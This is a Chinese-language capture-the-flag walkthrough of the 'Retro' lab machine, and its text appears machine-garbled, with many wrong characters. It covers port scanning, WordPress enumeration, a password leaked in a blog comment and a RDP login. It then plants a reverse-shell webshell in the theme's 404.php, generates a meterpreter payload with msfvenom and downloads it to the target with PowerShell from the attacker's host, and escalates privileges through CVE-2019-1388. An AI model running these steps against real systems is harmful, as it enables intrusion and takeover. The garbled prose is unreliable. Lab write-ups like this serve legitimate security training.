免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDTNmap scan report for 10.10.10.216Host is up (0.30s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.03389/tcp open ms-wbt-server Microsoft Terminal ServicesService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds只有一个80服务和数据库
爆破目录
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txtError Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.logTarget: http://10.10.10.216/[05:03:57] Starting: [05:04:35] 301 - 150B - /retro -> http://10.10.10.216/retro/ 扫到一个目录,浏览了一下,是一个wordpress网站
此时分两步枚举,一持续爆破这个目录,二wpsscan枚举wp信息
wp目录爆破
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txtError Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.logTarget: http://10.10.10.216/retro/[05:08:14] Starting: [05:08:21] 301 - 161B - /retro/wp-content -> http://10.10.10.216/retro/wp-content/[05:08:24] 301 - 162B - /retro/wp-includes -> http://10.10.10.216/retro/wp-includes/[05:09:04] 301 - 159B - /retro/wp-admin -> http://10.10.10.216/retro/wp-admin/爆出了三个文件夹,且没有文件遍历破绽,看上去没有什么能够利用的信息
wp信息枚举
确认wp版本为:5.2.1
└─# wpscan --url http://10.10.10.216/retro _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[i] It seems like you have not updated the database for some time.[?] Do you want to update now? [Y]es [N]o, default: [N]n[+] URL: http://10.10.10.216/retro/ [10.10.10.216][+] Started: Fri Nov 5 05:09:28 2021Interesting Finding(s):[+] Headers | Interesting Entries: | - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29 | Found By: Headers (Passive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] WordPress readme found: http://10.10.10.216/retro/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> | - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>[+] WordPress theme in use: 90s-retro | Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/ | Latest Version: 1.4.10 (up to date) | Last Updated: 2019-04-15T00:00:00.000Z | Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt | Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro | Style URI: https://organicthemes.com/retro-theme/ | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n... | Author: Organic Themes | Author URI: https://organicthemes.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.4.10 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Fri Nov 5 05:10:05 2021[+] Requests Done: 170[+] Cached Requests: 5[+] Data Sent: 44.025 KB[+] Data Received: 221.001 KB[+] Memory used: 210.141 MB[+] Elapsed time: 00:00:36kali搜寻这个版本wp的破绽
显示存在sql注入
┌──(rootkali)-[~]└─# searchsploit WordPress 5.2.1 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.mdWordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.pyWordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txtWordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txtWordPress Plugin Link Library 5.2.1 - SQL Injection | php/webapps/17887.txtWordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results看阐明是某个插件有一个注入破绽,但测试这个wp不存在这个插件,wpscan也没有扫出这个插件
在首页咱们看文章的作者名字叫wade,用这个账号尝试登陆wp提醒
ERROR: The password you entered for the username wade is incorrect.
这示意wade这个账号是的确存在的
咱们用wpscan枚举用户名也证实的确存在wade和Wade
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:01:07 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:01:07[i] User(s) Identified:[+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)[+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)user.txt的提醒是:
Don't leave sensitive information out in the open, even if you think you have control over it.
咱们假如作者在公共场合议论了跟本人明码无关的信息,兴许藏在博客文章里
期中一篇文章如同走漏了一些信息
Ready Player Oneby WadeI can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie! Ready Player One就是电源《头等玩家》,
至多咱们当初晓得作者经常会搞混本人和角色的名字,这个电影配角的名字叫:wade
在这条post的comment上面,作者泄露了本人的明码parzival:
WadeDecember 9, 2019Leaving myself a note here just in case I forget how to spell it: parzival初始shell
因为零碎开了3389服务,用wade:parzival远程桌面到靶机拿到user.txt
xfreerdp /u:wade /v:10.10.10.216
同时咱们能够用下面的凭证登录wordpress
wordpress的浸透套路是,一旦失去了管理员的登录账户就去到Appearance->Theme Edlitor里编辑源代码
我个别把webshell写到404.php这个页面,而后在前台拜访一个不存在的页面,触发反弹shell
咱们把windows版本reverse_shell写到404.php,拿到webshell
┌──(rootkali)-[~/tryhackme]└─# nc -nlvp 4242 listening on [any] 4242 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792SOCKET: Shell has connected! PID: 3436Microsoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.C:\inetpub\wwwroot\retro>whoamiiis apppool\retro咱们用msfvenom生成一个稳固的shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe
用webshell上传到靶机
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"
把nc和wget下载到靶机,以便后续浸透应用,经测试C:\users\public\Downloads是可写的:
在远程桌面,用wade的账号点击shell_64.exe,收到wade的反弹shell
msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler [*] Using configured payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (200262 bytes) to 10.10.10.216[*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500meterpreter > getuidServer username: RETROWEB\Wade提权
对于提权的提醒是:
Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.
我结尾认为是在cmd或者powershell里找历史命令,然而没有播种。起初发现是在浏览器的历史记录里,作者留下了寻找CVE-2019-1388 的提醒
我在github上找到了这个提权脚本。
github上的解释比较简单,我前面依据这篇具体介绍这个破绽原理的文章提权到了system
总的来说提权原理就是文章里这段:
当 OID 为超链接时,通过点击此链接会触发 consent.exe 以 SYSTEM 权限关上浏览器拜访此链接,而后此浏览器就会有 SYSTEM 权限。通过保留该浏览页面,会弹出微软的资源管理器,在资源管理器中邮件关上 cmd.exe 程序,就会继承浏览器的 SYSTEM 权限,由此就实现了由普通用户到 NT AUTHORITY\SYSTEM 用户的提权!
在Administrator桌面拿到root.txt
C:\Users\Administrator\Desktop>dirdir Volume in drive C has no label. Volume Serial Number is 7443-948C Directory of C:\Users\Administrator\Desktop12/08/2019 08:06 PM <DIR> .12/08/2019 08:06 PM <DIR> ..12/08/2019 08:08 PM 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 30,362,959,872 bytes free